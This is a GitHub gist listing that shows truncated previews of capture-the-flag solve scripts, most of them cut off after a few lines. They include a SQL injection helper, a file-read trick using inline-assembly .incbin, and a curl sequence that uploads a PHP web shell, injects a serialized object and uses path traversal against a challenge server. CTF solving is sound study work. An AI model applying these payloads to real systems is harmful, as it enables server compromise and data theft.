Skip to content

Instantly share code, notes, and snippets.

View st98's full-sized avatar

st98 st98

102 followers · 51 following
View GitHub Profile
@st98
st98 / build.py
Last active April 8, 2021 12:02
(not solved, just making quine) / TSG CTF 2020 - Self Host
import os
import re
import sys
def str_to_list(a):
return ','.join(str(ord(c)) for c in a)
if __name__ == '__main__':
if len(sys.argv) < 2:
print 'gimme argv'
@st98
st98 / solve.py
Last active April 8, 2021 11:57
ASIS CTF Quals 2020 - Upload Center
import base64
import requests
import time
COMMAND = 'ls'
###
result = ''
i = len(result) + 1
@st98
st98 / exp.py
Created September 13, 2019 13:51
babysql https://twitter.com/__Sehun_Oh__/status/1171445632210391040
import json
import requests
import urllib.parse
def f(s):
return 'chr(' + ')||chr('.join(str(ord(c)) for c in s) + ')'
ip = f('::ffff:(IP address)')
res = ''
@st98
st98 / solve.py
Last active April 8, 2021 11:58
TokyoWesterns CTF 5th 2019 - Oneline Calc (flag 1)
import re
import requests
from urllib.parse import quote
code = '''
1;
asm goto (""::::a);
goto b;
a: asm(".incbin \\"/srv/olc/public/calc.php\\"");
@st98
st98 / pascal_homomorphicity.py
Created August 12, 2019 13:25
InterKosenCTF - pascal homomorphicity
from pwn import *
s = remote('crypto.kosenctf.com', 8002)
s.recvline()
encrypted = int(s.recvline())
s.recvline()
table = ''.join(sorted('{}abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_- !?#'))
@st98
st98 / one_quadrillion.py
Last active April 8, 2021 11:58
Harekaze CTF 2019 - One Quadrillion
import re
import requests
def extend(original_hash, data_to_add, start):
T = [5676567, 858051, 5476703, 265259, 4058727, 5112531, 964143, 1099579, 8277687, 8717411, 2022783, 7207499, 1997447, 5864691, 828623, 3917019]
v = [int(x) for x in re.findall(r'.{7}', original_hash)]
i = start
for block in re.findall(r'.{7}', data_to_add)[::-1]:
s = int(block)
@st98
st98 / image_to_html.py
Last active March 25, 2019 16:34
選択すると画像が出てくるやつ
import binascii
import os
import string
import sys
import random
from PIL import Image
TEMPLATE = '''
<!doctype html>
<html>
@st98
st98 / oh-my-hash.py
Last active April 8, 2021 12:03
InterKosenCTF - [Crypto] Oh my Hash
# `dmin, cdmin, edmin, idmin, qdmin, Admin, !dmin
s = '''3dbd6c666db1e6ecbf391ff37622f30f
bdbd48266da0fee8dd190fe16e26f3cf
2d9f446765b1cefd95980fa35e32f24f
1dac5c6e7db1aee08d11a7e33c8ef15f
3d3d6c664d31fef8bd1d4ee36f32f3cf
3cbd4c662ca1eec8dd11afc35c0e634e
3db5c4626db3eef8151d0be37f27e347'''.splitlines()
s = [bin(int(c, 16))[2:].rjust(128, '0') for c in s]
@st98
st98 / exploit.sh
Last active May 13, 2020 03:18
Insomni'hack teaser 2018 - [Web] File Vault
#!/bin/bash
URL="http://filevault.teaser.insomnihack.ch"
SANDBOX_DIR="827bfe788a9d99ceecaef263c52e34a1570c8349"
curl -c cookie.txt "$URL/?action=reset"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"
curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=1" -d 'newname=;s:8:"realname";s:9:"aaaaaaaaa";}i:1;O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"realname";i:8;s:8:"filename";s:67:"'
curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=0" -d "newname=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../.php"
@st98
st98 / reset_marathon.py
Created September 7, 2017 19:13
SECCON 2017 × CEDEC CHALLENGE - リセマラ
import hashlib
import hmac
import json
import sys
import urlparse
import requests
from Crypto.Cipher import AES
def xor(a, b):